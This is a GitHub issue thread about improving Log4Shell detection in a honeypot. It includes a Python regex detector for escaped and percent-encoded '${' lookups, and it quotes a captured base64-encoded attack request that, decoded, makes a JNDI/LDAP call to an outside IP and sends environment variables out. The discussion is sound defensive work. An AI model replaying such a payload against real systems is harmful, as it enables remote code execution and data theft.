Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Detection String and False Positives #1

Open
antman1p opened this issue Dec 15, 2021 · 5 comments
Open

Detection String and False Positives #1

antman1p opened this issue Dec 15, 2021 · 5 comments
Assignees
Labels
enhancement New feature or request

Comments

@antman1p
Copy link

This log4j honeypot is a great idea! However, I have a suggestion.
Detecting only on the string ${ might prove to elicit many false positives. While using some of the common YARA strings being published are proving vulnerable to WAF bypasses, and elicit many false negatives. Karan Lyons has published log4shell regexes that appear to mitigate this. https://gist.github.com/karanlyons/8635587fd4fa5ddb4071cc44bb497ab6

@4Nzic-fiddler
Copy link
Contributor

Thank you very much @antman1p ! I thought about that and decided that since this is an INTERNAL honeypot and any scanning of its ports would be unusual to begin with, I wanted to cast as broad a net as possible to detect anything that could possibly be a payload. Personally I have been frustrated with constantly tuning my regex to account for every new obfuscation that I've seen in jndi payloads, so I figured ${ would be the minimum viable matching pattern and I wouldn't mind a few false positives if anything that looked like that scanned my internal network.

@karanlyons
Copy link

Hey @4Nzic-fiddler!

Totally understand that view. But if you’re looking to get every new obfuscation you probably still want to handle escaped characters / percent encoding, and possibly handle it recursively: that may get you closer to your goal. Consider, then, using ESC_DOLLAR + ESC_LCURLY and a modified form of test_thorough that just checks for a match on that, i.e. (untested):

import re
from urllib.parse import unquote


FLAGS = re.IGNORECASE | re.DOTALL
ESC_DOLLAR = r'(?:\$|\\u0024||\\x24|\\0?44|%24)'
ESC_LCURLY = r'(?:\{|\\u007B|\\x7B|\\173|%7B)'
_BACKSLASH_ESCAPE_RE = re.compile(r'\\(?:u[0-9af]{4}|x[0-9af]{2}|[0-7]{,3})')
_PERCENT_ESCAPE_RE = re.compile(r'%[0-9af]{2}')


START_TOKEN_INCL_ESCS_RE = re.compile(
	ESC_DOLLAR + ESC_LCURLY,
	flags=FLAGS,
)


def simple_test_thorough(string):
	last_string = None
	
	while (
		last_string != string
		and (
			last_string is None
			or len(last_string) > len(string)
		)
	):
		if match := START_TOKEN_INCL_ESCS_RE.search(string):
			return True
		
		last_string = string
		
		if _BACKSLASH_ESCAPE_RE.search(string):
			string = string.encode().decode('unicode_escape')
		
		if _PERCENT_ESCAPE_RE.search(string):
			string = unquote(string)
	
	return False

@4Nzic-fiddler
Copy link
Contributor

Good points! I'll see if I can carve out some time (currently putting out log4j fires) and test that code. I also want to incorporate looking for base64 encoded ${ as shown by these examples from GreyNoise: https://gist.github.com/nathanqthai/197b6084a05690fdebf96ed34ae84305

This one in particular is tricky:
GET /websso/SAML2/SSOSSL/vsphere.local?RelyingPartyEntityId=JHskezo6LWp9bmRpOmxkYXA6Ly80NS43Ny4xMjQuNjE6NDQzLyMzZDJmMjc3MjczNzQ3ODVmZGVlMjkyYjI0Nzg2MjFkZF86O18ke2VudjpQQVRIfV86O18ke2VudjpVU0VSfV86O18ke2VudjpVU0VSTkFNRX1fOjtfJHtlbnY6SE9TVE5BTUV9Xzo7XyR7ZW52OlVTRVJETlNET01BSU59Xzo7XyR7ZW52OkNPTVBVVEVSTkFNRX1fOjtfJHtidW5kbGU6YXBwbGljYXRpb246c3ByaW5nLmRhdGFzb3VyY2UudXJsfV86O18ke3N5czpqYXZhLnZlcnNpb259fQ== HTTP/1.1

@4Nzic-fiddler
Copy link
Contributor

Base64 of ${j is JHtq
Base64 of ${${ starts with JHske
I'm not sure if that's too aggressive to search for just those

@4Nzic-fiddler 4Nzic-fiddler self-assigned this Dec 16, 2021
@4Nzic-fiddler 4Nzic-fiddler added the enhancement New feature or request label Dec 16, 2021
@karanlyons
Copy link

base64 isn't actually in a release yet, just in master so you don't necessarily have to worry about it. People were confused (including myself) because I think some of us were accidentally reading master instead of the tagged releases and also because one of the log4j2 user guides (which is version stamped with 2.x) states that base64 is available.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
enhancement New feature or request
Projects
None yet
Development

No branches or pull requests

3 participants